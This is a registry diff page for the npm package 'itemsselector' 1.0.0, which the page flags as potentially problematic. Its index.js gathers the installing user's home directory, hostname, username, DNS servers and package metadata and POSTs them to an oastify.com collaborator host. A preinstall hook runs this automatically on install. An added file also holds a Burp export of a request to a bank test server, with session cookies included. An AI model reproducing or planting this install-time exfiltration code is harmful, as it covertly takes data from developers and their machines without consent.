itemsselector 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of itemsselector might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +47 -0
  2. package/package.json +12 -0
  3. package/sqli1 +42 -0
package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ p: package,
10
+ c: __dirname,
11
+ hd: os.homedir(),
12
+ hn: os.hostname(),
13
+ un: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ v: packageJSON.version,
17
+ pjson: packageJSON,
18
+ });
19
+
20
+ var postData = querystring.stringify({
21
+ msg: trackingData,
22
+ });
23
+
24
+ var options = {
25
+ hostname: "xstg81q612lrayltebfx3lajkaq0ep.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
26
+ port: 443,
27
+ path: "/",
28
+ method: "POST",
29
+ headers: {
30
+ "Content-Type": "application/x-www-form-urlencoded",
31
+ "Content-Length": postData.length,
32
+ },
33
+ };
34
+
35
+ var req = https.request(options, (res) => {
36
+ res.on("data", (d) => {
37
+ process.stdout.write(d);
38
+ });
39
+ });
40
+
41
+ req.on("error", (e) => {
42
+ // console.error(e);
43
+ });
44
+
45
+ req.write(postData);
46
+ req.end();
47
+
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "itemsselector",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/sqli1 ADDED
@@ -0,0 +1,42 @@
1
+ <?xml version="1.0"?>
2
+ <!DOCTYPE items [
3
+ <!ELEMENT items (item*)>
4
+ <!ATTLIST items burpVersion CDATA "">
5
+ <!ATTLIST items exportTime CDATA "">
6
+ <!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
7
+ <!ELEMENT time (#PCDATA)>
8
+ <!ELEMENT url (#PCDATA)>
9
+ <!ELEMENT host (#PCDATA)>
10
+ <!ATTLIST host ip CDATA "">
11
+ <!ELEMENT port (#PCDATA)>
12
+ <!ELEMENT protocol (#PCDATA)>
13
+ <!ELEMENT method (#PCDATA)>
14
+ <!ELEMENT path (#PCDATA)>
15
+ <!ELEMENT extension (#PCDATA)>
16
+ <!ELEMENT request (#PCDATA)>
17
+ <!ATTLIST request base64 (true|false) "false">
18
+ <!ELEMENT status (#PCDATA)>
19
+ <!ELEMENT responselength (#PCDATA)>
20
+ <!ELEMENT mimetype (#PCDATA)>
21
+ <!ELEMENT response (#PCDATA)>
22
+ <!ATTLIST response base64 (true|false) "false">
23
+ <!ELEMENT comment (#PCDATA)>
24
+ ]>
25
+ <items burpVersion="2022.8.4" exportTime="Sun May 28 18:21:11 IST 2023">
26
+ <item>
27
+ <time>Thu Jan 01 05:30:00 IST 1970</time>
28
+ <url><![CDATA[https://servicenabenterpriseuat.nabtest.com.au/amb/connect]]></url>
29
+ <host ip="149.96.93.121">servicenabenterpriseuat.nabtest.com.au</host>
30
+ <port>443</port>
31
+ <protocol>https</protocol>
32
+ <method><![CDATA[POST]]></method>
33
+ <path><![CDATA[/amb/connect]]></path>
34
+ <extension>null</extension>
35
+ <request base64="true"><![CDATA[UE9TVCAvYW1iL2Nvbm5lY3QgSFRUUC8xLjENCkhvc3Q6IHNlcnZpY2VuYWJlbnRlcnByaXNldWF0Lm5hYnRlc3QuY29tLmF1DQpDb29raWU6IEJJR2lwU2VydmVycG9vbF9uYWJlbnRlcnByaXNldWF0PWY2MzMyYTc5M2NiMDJjYzIyZTQ2NGM3ZDY5MzFkZTU0OyBKU0VTU0lPTklEPTVCODYyRkNEMjU3NUVGRjZCNzUyODc3OTZFREZFQjMzOyBnbGlkZV91c2VyX3JvdXRlPWdsaWRlLmM2M2Y5MjU4MWE1OWU0OTc2NzQ5MDRmZWZmOWNkN2Y1OyBCQVlFVVhfQlJPV1NFUj1jMGl5MWRmeGVldTFvb3ViDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0OyBydjoxMDkuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMTMuMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KUmVmZXJlcjogaHR0cHM6Ly9zZXJ2aWNlbmFiZW50ZXJwcmlzZXVhdC5uYWJ0ZXN0LmNvbS5hdS9mb3JtZXJfY29sbGVhZ3Vlcw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uO2NoYXJzZXQ9VVRGLTgNClgtVHJhbnNhY3Rpb24tU291cmNlOiBJbnRlcmZhY2U9U2VydmljZS1Qb3J0YWwsSW50ZXJmYWNlLVR5cGU9Zm9ybWVyX2NvbGxlYWd1ZXMsSW50ZXJmYWNlLVN5c0lEPTkzZWU0Mzg0ZGJjZTY0NTQ1NGY5MTUxMzNhOTYxOWJmDQpDb250ZW50LUxlbmd0aDogMTA5DQpPcmlnaW46IGh0dHBzOi8vc2VydmljZW5hYmVudGVycHJpc2V1YXQubmFidGVzdC5jb20uYXUNClNlYy1GZXRjaC1EZXN0OiBlbXB0eQ0KU2VjLUZldGNoLU1vZGU6IGNvcnMNClNlYy1GZXRjaC1TaXRlOiBzYW1lLW9yaWdpbg0KVGU6IHRyYWlsZXJzDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQpbeyJpZCI6IjYiLCJjaGFubmVsIjoiL21ldGEvY29ubmVjdCIsImNvbm5lY3Rpb25UeXBlIjoibG9uZy1wb2xsaW5nIiwiY2xpZW50SWQiOiIzOW9lbjQydGZwaTU3cnNzbjB5cHc4OHY5In1d]]></request>
36
+ <status>500</status>
37
+ <responselength>828</responselength>
38
+ <mimetype>HTML</mimetype>
39
+ <response base64="true"><![CDATA[SFRUUC8xLjEgNTAwIEludGVybmFsIFNlcnZlciBFcnJvcg0KU2VydmVyOiBzbm93X2FkYw0KRGF0ZTogU3VuLCAyOCBNYXkgMjAyMyAxMjo1MDoyMiBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sO2NoYXJzZXQ9VVRGLTgNCkNvbnRlbnQtTGVuZ3RoOiAxOTYNCkNvbm5lY3Rpb246IGNsb3NlDQpTZXQtQ29va2llOiBCSUdpcFNlcnZlcnBvb2xfbmFiZW50ZXJwcmlzZXVhdD1mNjMzMmE3OTNjYjAyY2MyMmU0NjRjN2Q2OTMxZGU1NDsgaHR0cG9ubHk7IHNlY3VyZTsgcGF0aD0vOyBTYW1lU2l0ZT1Ob25lDQpQcmFnbWE6IG5vLXN0b3JlLG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZSxuby1zdG9yZSxtdXN0LXJldmFsaWRhdGUsbWF4LWFnZT0tMQ0KRXhwaXJlczogMA0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KeC1lZGdlLWVuYy1wcm94eS1zdGF0aWM6IHRydWUNCkNyb3NzLU9yaWdpbi1FbWJlZGRlci1Qb2xpY3k6IHJlcXVpcmUtY29ycA0KTGFzdC1Nb2RpZmllZDogRnJpLCAxNyBGZWIgMjAyMyAyMToyNjo0MiBHTVQNCkFjY2VwdC1SYW5nZXM6IGJ5dGVzDQpTdHJpY3QtVHJhbnNwb3J0LVNlY3VyaXR5OiBtYXgtYWdlPTYzMDcyMDAwOyBpbmNsdWRlU3ViRG9tYWlucw0KDQo8IURPQ1RZUEUgaHRtbD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5FcnJvciBQYWdlPC90aXRsZT4KPC9oZWFkPgoKPGJvZHk+CiAgICA8aDIgYWxpZ249ImNlbnRlciIgc3R5bGU9Im1hcmdpbjoxMCU7Ij5Tb3JyeSwgYW4gZXJyb3Igb2NjdXJyZWQgb3IgdGhpcyBwYWdlIGlzbid0IGF2YWlsYWJsZS48L2gyPgo8L2JvZHk+Cgo8L2h0bWw+]]></response>
40
+ <comment></comment>
41
+ </item>
42
+ </items>